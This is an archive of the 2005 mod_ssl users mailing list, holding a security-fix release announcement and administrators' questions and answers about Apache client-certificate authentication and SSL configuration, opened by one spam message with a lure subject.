Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20050902060112.0CCF214D987@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


very good movie        >>> Video's Media Player. SEX SEX * Sluts Tits Video Mpeg's Mpeg Video Clips
 
 
Engelschall.com servers automatically scanned for viruses using McAfee SECURITY

            =3D--Movie Attached--=3D

----NextMimePartHTML--




----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep  2 23:05:44 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9635E14EADB; Fri,  2 Sep 2005 23:05:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp1.engelschall.com (visp1.engelschall.com [195.30.6.144])
	by master.modssl.org (Postfix) with ESMTP id DA32A14D97F;
	Fri,  2 Sep 2005 23:05:43 +0200 (CEST)
Received: by visp1.engelschall.com (Postfix, from userid 21100)
	id 14C9C1B448AC; Fri,  2 Sep 2005 23:05:43 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 0D2EBA17F1; Fri,  2 Sep 2005 23:05:34 +0200 (CEST)
Date: Fri, 2 Sep 2005 23:05:34 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.24-1.3.33
Message-ID: <20050902210533.GA3256@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Organization: Engelschall, Germany.
User-Agent: Mutt/1.5.10i OpenPKG/CURRENT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

A subtle security bug (CAN-2005-2700) was discovered in mod_ssl where
where "SSLVerifyClient require" was not enforced in per-location context
if "SSLVerifyClient optional" was configured in the global virtual
host configuration. This bug is now fixed in mod_ssl 2.8.24 for Apache
1.3.33. Get it from:

  o http://www.modssl.org/source/
  o  ftp://ftp.modssl.org/source/

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Sep  4 23:08:01 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2DEA114D9A0; Sun,  4 Sep 2005 23:08:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail27.sea5.speakeasy.net (mail27.sea5.speakeasy.net [69.17.117.29])
	by master.modssl.org (Postfix) with ESMTP id 82D4B14D977
	for ; Sun,  4 Sep 2005 23:07:59 +0200 (CEST)
Received: (qmail 27710 invoked from network); 4 Sep 2005 21:07:56 -0000
Received: from dsl081-246-226.sfo1.dsl.speakeasy.net (HELO [10.10.1.252]) ([64.81.246.226])
          (envelope-sender )
          by mail27.sea5.speakeasy.net (qmail-ldap-1.03) with SMTP
          for ; 4 Sep 2005 21:07:56 -0000
Mime-Version: 1.0 (Apple Message framework v734)
Content-Transfer-Encoding: 7bit
Message-Id: 
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
To: modssl-users@modssl.org
From: Aaron Turner 
Subject: client certificates won't verify under Apache
Date: Sun, 4 Sep 2005 14:07:51 -0700
X-Mailer: Apple Mail (2.734)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aaron Turner 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm running CentOS 4.1 with Apache 2.0.52 and trying to setup client  
SSL authentication using an internal CA.  I've read the docs and  
checked the list archives for someone having the same problem or any  
hints, but have come up empty so far.  Anyways...

Running:
openssl verify -CAfile ssl.crt/cacert.crt -purpose sslclient  
aaron_turner.crt

Returns OK.

But configuring apache with:
SSLProtocol all
SSLCipherSuite HIGH:MEDIUM
SSLCertificateFile conf/ssl.crt/updates.musecurity.net.crt
SSLCertificateKeyFile conf/ssl.key/updates.musecurity.net
SSLCACertificatePath conf/ssl.crt
SSLVerifyClient require
SSLVerifyDepth  1

where my conf/ssl.crt directory has the cacert.crt with the  
approrpriate hashes, when I run:

openssl s_client -connect updates.musecurity.net:443 -CAfile  
cacert.pem -cert aaron_turner.pem -certform pem -showcerts -verify 1

I get:
[error] Certificate Verification: Error (19): self signed certificate  
in certificate chain

In my ssl_error_log.

openssl returns:
verify depth is 1
CONNECTED(00000003)
depth=1 /C=US/ST=California/L=Sunnyvale/O=MuSecurity, Inc./ 
emailAddress=aturner@musecurity.com
verify return:1
depth=0 /C=US/ST=California/L=Sunnyvale/O=MuSecurity, Inc./OU=Update  
Server/CN=updates.musecurity.net/emailAddress=mu-support@musecurity.com
verify return:1
871:error:14094418:SSL routines:SSL3_READ_BYTES:tlsv1 alert unknown  
ca:s3_pkt.c:1054:SSL alert number 48
871:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake  
failure:s23_lib.c:230:


I think somewhat related is my problem with using:
SSLCACertificateFile conf/ssl.crt/cacert.crt

which gives me an error:
SSLCACertificateFile: file '/etc/httpd/conf/ssl.crt/cacert.crt' does  
not exist or is empty

which is quite strange since the file does exist, contains the  
certificate and has the correct perms (files are 644 and directories  
755).  I've even tried copying over the aaron_turner.crt to the conf/ 
ssl.crt directory and regenerating the hashes, but that doesn't help.

I can only assume I'm missing something horribly obvious, but I've  
been working on this for hours with no luck...

TIA,
Aaron

-- 
Aaron Turner, Sr. Security Engineer                    

Ph: 408.329.1956


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep  9 16:59:22 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C8D3C14D9AC; Fri,  9 Sep 2005 16:59:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx2.eyp.ee (sebra.eyp.ee [62.65.41.134])
	by master.modssl.org (Postfix) with ESMTP id 966A314D97B
	for ; Fri,  9 Sep 2005 16:59:22 +0200 (CEST)
Received: from internal by mx2.eyp.ee;
	for ; Fri, 9 Sep 2005 17:59:22 +0300
Message-ID: <4321A350.2030902@seb.ee>
Date: Fri, 09 Sep 2005 17:59:28 +0300
From: Priit Randla 
Organization: SEB Eesti =?UTF-8?B?w5xoaXNwYW5r?=
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050802 Fedora/1.7.10-1.3.1
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: OptRenegotiate and IE problem.
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Scanned-By: MIMEDefang 2.52 on 172.26.243.6
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Priit Randla 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


    Hello,

I've got a problem I've been unable to resolve. Maybe somebody here has
the know-how to help me?
I've got a  Apache+ModSSL webserver with  a  directory  which requires
clients to authenticate themselves with
a certificate. Certificates (and keys) are on a smartcard. When the
client requests for a file in protected directory,
let's say /some_content/protected/some_file, browser asks for PIN,
client enters it and gets his/her content.
Now the problem:
If the client uses a pinpad equipped smartcard reader, he/she will be
prompted for pin for every page he requests -
drivers for these devices are unable do cache pins and the ssl-session
will be invalidated every time the browser
requests a file outside of protected area.
For technical reasons I can't require certificate based authentication
for whole server - it breaks some java applets
which have to load components from the server.
If I do use server-wide SSLOptions +OptRenegotiate, things will somewhat
improve - Mozilla-based browsers now work without eternal
ssl-session renewal and the client only has to enter PIN once. However,
IE6 _still_ requires PIN for every page view.

So - how should I configure the server to avoid this kind of behavior?

Regards,
Priit



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Sep 11 19:45:22 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4233E14D839; Sun, 11 Sep 2005 19:45:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pfepc.post.tele.dk (pfepc.post.tele.dk [195.41.46.237])
	by master.modssl.org (Postfix) with ESMTP id 1153F14D832
	for ; Sun, 11 Sep 2005 19:45:21 +0200 (CEST)
Received: from strandbygaard.net (0x50c72f98.adsl-fixed.tele.dk [80.199.47.152])
	by pfepc.post.tele.dk (Postfix) with SMTP id 4045E262866
	for ; Sun, 11 Sep 2005 19:45:16 +0200 (CEST)
Received: (qmail 8492 invoked from network); 11 Sep 2005 17:45:38 -0000
Received: from mac.strandbygaard.net (HELO ?10.0.2.2?) (10.0.2.2)
  by 0 with SMTP; 11 Sep 2005 17:45:38 -0000
Mime-Version: 1.0 (Apple Message framework v734)
Content-Transfer-Encoding: 7bit
Message-Id: 
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
To: modssl-users@modssl.org
From: Martin Strandbygaard Jensen 
Subject: Problem with colon in subject DN when using FakeBasicAuth
Date: Sun, 11 Sep 2005 19:45:15 +0200
X-Mailer: Apple Mail (2.734)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Martin Strandbygaard Jensen 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I'm using FakeBasicAuth with Apache which works fine with most user  
certificates. However, user certificates with colons in the subject  
doesn't work. The following illustrates the problem

- FakeBasicAuth works with a user entry like:

/CN=Martin Strandbygaard/C=Denmark/L=Copenhagen/ 
emailAddress=martin@strandbygaard.net

But not with the following entry:

/C=DK/O=Ingen organisatorisk tilknytning/CN=Martin Strandbygaard  
Jensen/serialNumber=PID:9802-2002-2-529764104948:xxj31ZMTZzkVA

Notice the colon after the "PID" part. I get the following error in  
the apache log:

[Sun Sep 11 17:14:24 2005] [error] [client 10.0.2.2] user /C=DK/ 
O=Ingen organisatorisk tilknytning/CN=Martin Strandbygaard Jensen/ 
serialNumber=PID not found: /test/test.php

 From this I gather that the problem is the colon after the PID part.  
I've tried the usual ways of escaping the colon, as well as the  
entire string, but nothing has worked so far.

Does anyone know how to deal with colons in the subject? (they're  
government issued certificates, that follow a specific template, so  
removing the colon is not an option).

Regards
Martin Strandbygaard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 12 20:44:38 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B439314D83D; Mon, 12 Sep 2005 20:44:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web40527.mail.yahoo.com (web40527.mail.yahoo.com [66.218.92.47])
	by master.modssl.org (Postfix) with SMTP id 39FCB14D82F
	for ; Mon, 12 Sep 2005 20:44:35 +0200 (CEST)
Received: (qmail 3904 invoked by uid 60001); 12 Sep 2005 18:44:34 -0000
Message-ID: <20050912184434.3902.qmail@web40527.mail.yahoo.com>
Received: from [216.140.242.90] by web40527.mail.yahoo.com via HTTP; Mon, 12 Sep 2005 11:44:34 PDT
X-RocketYMMF: cdevidal
Date: Mon, 12 Sep 2005 11:44:34 -0700 (PDT)
From: Chris de Vidal 
Subject: Two different physical hosts + IPs, one cert
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Chris de Vidal 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am going to install two different servers in two different physical locations
which would necessitate two different IPs.  I will use multiple identical DNS A
records to round-robin traffic like this:
1.1.1.1 -> example.com
2.2.2.2 -> example.com

I'm just not sure about SSL; can I create one certificate pointing to one
hostname?  I would think so, as openssl req asks for the hostname only; no IPs.
 But I wanted to be certain.

CD
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 12 20:57:09 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4F4D514D83F; Mon, 12 Sep 2005 20:57:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.195])
	by master.modssl.org (Postfix) with ESMTP id EE04A14D830
	for ; Mon, 12 Sep 2005 20:57:07 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id i31so2483238wxd
        for ; Mon, 12 Sep 2005 11:57:03 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=QTlhX3+MEOGIP3y29lIagdrLBep2sILUcjBjFbuPRID973c7WiTtvnVOGwpm+4VryAH63anIK69UxbDZ9AdIGKLcoYpuOyyM9wlzO5nLa8MRMzrm01q1b8u+plDeTUUEy2+wot9CTEFDi1WGEiLRi1vWy3Dyp5ZO792bJoRC2Eg=
Received: by 10.70.109.20 with SMTP id h20mr6181wxc;
        Mon, 12 Sep 2005 11:57:03 -0700 (PDT)
Received: by 10.70.75.5 with HTTP; Mon, 12 Sep 2005 11:57:03 -0700 (PDT)
Message-ID: 
Date: Mon, 12 Sep 2005 14:57:03 -0400
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: Two different physical hosts + IPs, one cert
In-Reply-To: <20050912184434.3902.qmail@web40527.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <20050912184434.3902.qmail@web40527.mail.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

The certificate refers to the host by name, not by IP address.  So as
long as the two hosts have exactly the same FQDN, then you should be
fine.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 13 11:18:52 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2055414D840; Tue, 13 Sep 2005 11:18:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.196])
	by master.modssl.org (Postfix) with ESMTP id 8ECDC14D829
	for ; Tue, 13 Sep 2005 11:18:50 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id i31so2663131wxd
        for ; Tue, 13 Sep 2005 02:18:46 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=HpK7HcAFsUkCYQtcI9CHdmo8Kli0hYbOcyCjmZElov5Kq7OnLzPw7nIt/NL9p0duwFesOZp23nhhqjsA2lxiwMbJeExVRlYVBegC6kkvsJH++dqeuPl1UHe0urjGMB0VXXpjHYQU+MXFM96WP3tYVVz4ejd+gZkGaNSVZPhecLY=
Received: by 10.70.112.4 with SMTP id k4mr149391wxc;
        Tue, 13 Sep 2005 02:18:46 -0700 (PDT)
Received: by 10.70.94.9 with HTTP; Tue, 13 Sep 2005 02:18:46 -0700 (PDT)
Message-ID: <2b865b050913021839d89e33@mail.gmail.com>
Date: Tue, 13 Sep 2005 10:18:46 +0100
From: john doe 
To: modssl-users@modssl.org
Subject: SSLVerifyClient, 2 domains, 1 localhost, JVM1.4
In-Reply-To: 
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <20050912184434.3902.qmail@web40527.mail.yahoo.com>
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: john doe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi everyone,

I'd be very gratefull if someone could help me on this one.

I set up my apache/ssl server in order to have strong authentication.

The reason of my problems comes from the fact that I use a JVM 1.4 :
when I try to download a specific module, the JVM will try to ask a
client certificate. Since the certificate is stored in the browser
keystore (and not in the JVM keystore), the download fails...
It works all fine when I use a JVM 1.3 : applets cannot be loaded with
JRE1.4 when SSL Client Authentication is required by webserver.

I only use one IP for my secured domain : https://localhost:666/ and I
try to use different virtual hosts, but it didn't work.

I also tried to use a  tab and to specify not ask a
certificate by saying : SSLVerifyClient none.
But it didn't work either.

I'll take whatever you have to offer as an anwser...

Thx !!
ad
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 13 11:43:51 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6231514D840; Tue, 13 Sep 2005 11:43:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.206])
	by master.modssl.org (Postfix) with ESMTP id DF54F14D829
	for ; Tue, 13 Sep 2005 11:43:50 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id i31so2667985wxd
        for ; Tue, 13 Sep 2005 02:43:49 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=m2bEkTseDxlj8BEuIGw7plZtZgtMECltfHWu/a23fmJjgrouoQbYCTzjqOK+CYHdrt4wucqdS8aJ0XtN5/GOcZnHBL+BwIn3pqvmUnxE3QjH8ZOpJJj42C/tAflULHo1NrC35XzaomBjBTfd3pSjWVvmNj5fwvmF8MiQDe5z6Io=
Received: by 10.70.109.20 with SMTP id h20mr139758wxc;
        Tue, 13 Sep 2005 02:43:49 -0700 (PDT)
Received: by 10.70.94.9 with HTTP; Tue, 13 Sep 2005 02:43:49 -0700 (PDT)
Message-ID: <2b865b050913024359544aad@mail.gmail.com>
Date: Tue, 13 Sep 2005 10:43:49 +0100
From: john doe 
To: modssl-users@modssl.org
Subject: SSLVerifyClient, 2 domains (secured and not secured), 1 localhost, JVM1.4
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: john doe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi everyone,

I'd be very gratefull if someone could help me on this one.

I set up my apache/ssl server in order to have strong authentication.

The reason of my problems comes from the fact that I use a JVM 1.4 :
when I try to download a specific module, the JVM will try to ask a
client certificate. Since the certificate is stored in the browser
keystore (and not in the JVM keystore), the download fails...
It works all fine when I use a JVM 1.3 : applets cannot be loaded with
JRE1.4 when SSL Client Authentication is required by webserver.

I only use one IP for my secured domain : https://localhost:666/ and I
try to use different virtual hosts, but it didn't work.

I also tried to use a  tab and to specify not ask a
certificate by saying : SSLVerifyClient none.
But it didn't work either.

I'll take whatever you have to offer as an anwser...

Thx !!
adrian
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 05:08:02 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C03CD14D84D; Mon, 26 Sep 2005 05:08:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cse.snu.ac.kr (cse.snu.ac.kr [147.46.127.34])
	by master.modssl.org (Postfix) with ESMTP id EA95014D82A
	for ; Mon, 26 Sep 2005 05:08:01 +0200 (CEST)
Received: from [147.46.247.198] ([147.46.247.198])
	(authenticated bits=0)
	by cse.snu.ac.kr (8.13.4/8.13.4/Debian-1) with ESMTP id j8Q386nD010913
	for ; Mon, 26 Sep 2005 12:08:06 +0900
Mime-Version: 1.0 (Apple Message framework v734)
Content-Transfer-Encoding: 7bit
Message-Id: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
To: modssl-users@modssl.org
From: Bob McKay 
Subject: 
Date: Mon, 26 Sep 2005 12:07:59 +0900
X-Mailer: Apple Mail (2.734)
X-BacchusMilter: Spam Blocker with perl
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bob McKay 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello; I would greatly appreciate assistance with an apache setup  
problem.

Aim: Im trying to set up a mixed http/https server. The plan is to  
hold secure stuff in one file hierarchy,
insecure in another. I don't seem to be able to get it to work. I've  
tried searching both apache/ssl forums
and fedora forums for any info, but can't find any reports of similar  
problems.

System info: Fedora core 4 on intel *86; I'm using the fedora httpd  
configuration tool to do the setup

General structure: I'm aiming to configure separate ip virtual  
servers to serve https traffic and http traffic

Problem: httpd startup always fails with the message:
"Starting httpd: (98)Address already in use: make_sock: could not  
bind to address :443
no listening sockets available, shutting down"

In httpd configuration tool, I have configured the available  
addresses as
:80
:443

I've configured two
virtual hosts:
"secure host" with address :443
(configured under the 'general options' tab as an ip virtual host on
:443
and with "enable ssl support" tiicked, and addresses provided for the  
various keys

default host with address Default virtual host:80
configured as default virtual host and listening on port 80
and with 'enable ssl support unticked

In the httpd.conf file this generates
Listen :80
Listen :443

and lower down
:443>
DocumentRoot /var/www/shtml/
ServerAdmin 
ServerName 
DirectoryIndex index.shtml index.html index.htm
SSLEngine on



ServerAdmin 
ServerName _default_:80
DirectoryIndex index.php index.html index.htm
SSLEngine on


(I'd prefer not to broadcast the whole httpd.conf for security  
reasons, but a search reveals there are no
other references to either of the numbers 80 or 443)

Oh, and there isn't anything else listening to port 443:
/sbin/fuser -4 -n udp 443
gives a null result.

Any thoughts? The httpd.conf file looks OK to me as far as I have  
been able to tell from reading the
documentation. In particular, is it possible that the httpd error is  
misleading me? I'm not absolutely
confident that my key setup is correct; is there any possibility that  
a failure in key lookup could
generate this error message about ports?

Thanks for any assistance
Bob


************************************************************************ 
*****************************************************
In case it's relevant, here's my key generation script (domain name  
deleted in case I've left any gaping security holes):

openssl genrsa -des3 -out /etc/httpd/conf/ssl.crt/ca.key 4096

openssl req -new -x509 -days 1000 -key /etc/httpd/conf/ssl.crt/ca.key  
-out /etc/httpd/conf/ssl.crt/ca.crt

openssl genrsa -des3 -out /etc/httpd/conf/ssl.key/server.key 4096

openssl req -new -key /etc/httpd/conf/ssl.key/server.key -out /etc/ 
httpd/conf/ssl.crt/server.csr -subj '/CN='

openssl x509 -req -days 1000 -in /etc/httpd/conf/ssl.crt/server.csr - 
CA /etc/httpd/conf/ssl.crt/ca.crt -CAkey /etc/httpd/conf/ssl.crt/ 
ca.key -signkey /etc/httpd/conf/ssl.key/server.key -set_serial 01 - 
out /etc/httpd/conf/ssl.crt/server.crt





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 14:28:58 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C4A1414D84C; Mon, 26 Sep 2005 14:28:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.203])
	by master.modssl.org (Postfix) with ESMTP id 5D85F14D82A
	for ; Mon, 26 Sep 2005 14:28:57 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h30so1055816wxd
        for ; Mon, 26 Sep 2005 05:28:57 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=mkWRmsq/bQ12F7U81trv/FCqWA9gjoVG8EU7FyQ6z4N/IjNk7fJMOiUrZStEp8vt+ADdP+0B0NkS0MbCzOqQhp5UyzzgMJoLLlwFDukWUwP3xa6pjgtcLb6/Jh6tCaQo1pOjC4tQlpg8ib8bkk3pOTe9zXzuWvla4B7AXE+TwXI=
Received: by 10.70.113.4 with SMTP id l4mr1498288wxc;
        Mon, 26 Sep 2005 05:22:12 -0700 (PDT)
Received: by 10.70.75.5 with HTTP; Mon, 26 Sep 2005 05:22:12 -0700 (PDT)
Message-ID: 
Date: Mon, 26 Sep 2005 08:22:12 -0400
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re:
In-Reply-To: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

It really does sound like there's something else listening on port 443:

> "Starting httpd: (98)Address already in use: make_sock: could not
> bind to address :443
> no listening sockets available, shutting down"

That's usually what this message means.  You said:

> Oh, and there isn't anything else listening to port 443:
> /sbin/fuser -4 -n udp 443
> gives a null result.

... except that it's tcp, not udp, that we care about here.

As for your httpd.conf, it looks sort of close, although the
":443>" block needs to have the SSL
certificate and key configuration directives as well as some other
stuff (see the example httpd.conf that comes with mod_ssl), and the
"" block should NOT contain "SSLEngine on".

Hope this helps,
--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 14:35:04 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E5D2514D86A; Mon, 26 Sep 2005 14:35:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mxsf21.cluster1.charter.net (mxsf21.cluster1.charter.net [209.225.28.221])
	by master.modssl.org (Postfix) with ESMTP id F3D1114D82C
	for ; Mon, 26 Sep 2005 14:35:01 +0200 (CEST)
Received: from mxip14a.cluster1.charter.net (mxip14a.cluster1.charter.net [209.225.28.144])
	by mxsf21.cluster1.charter.net (8.12.11/8.12.11) with ESMTP id j8QCYud4024723
	for ; Mon, 26 Sep 2005 08:34:56 -0400
Received: from 68-117-211-186.dhcp.athn.ga.charter.com (HELO desktop) (68.117.211.186)
  by mxip14a.cluster1.charter.net with SMTP; 26 Sep 2005 08:34:57 -0400
X-IronPort-AV: i="3.97,146,1125892800"; 
   d="scan'208"; a="795565771:sNHT22408596"
Message-ID: <06e501c5c296$b8334d60$02fea8c0@desktop>
From: "Pigeon" 
To: 
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr> 
Subject: Mod_ssl and how to reduce overhead
Date: Mon, 26 Sep 2005 08:35:03 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
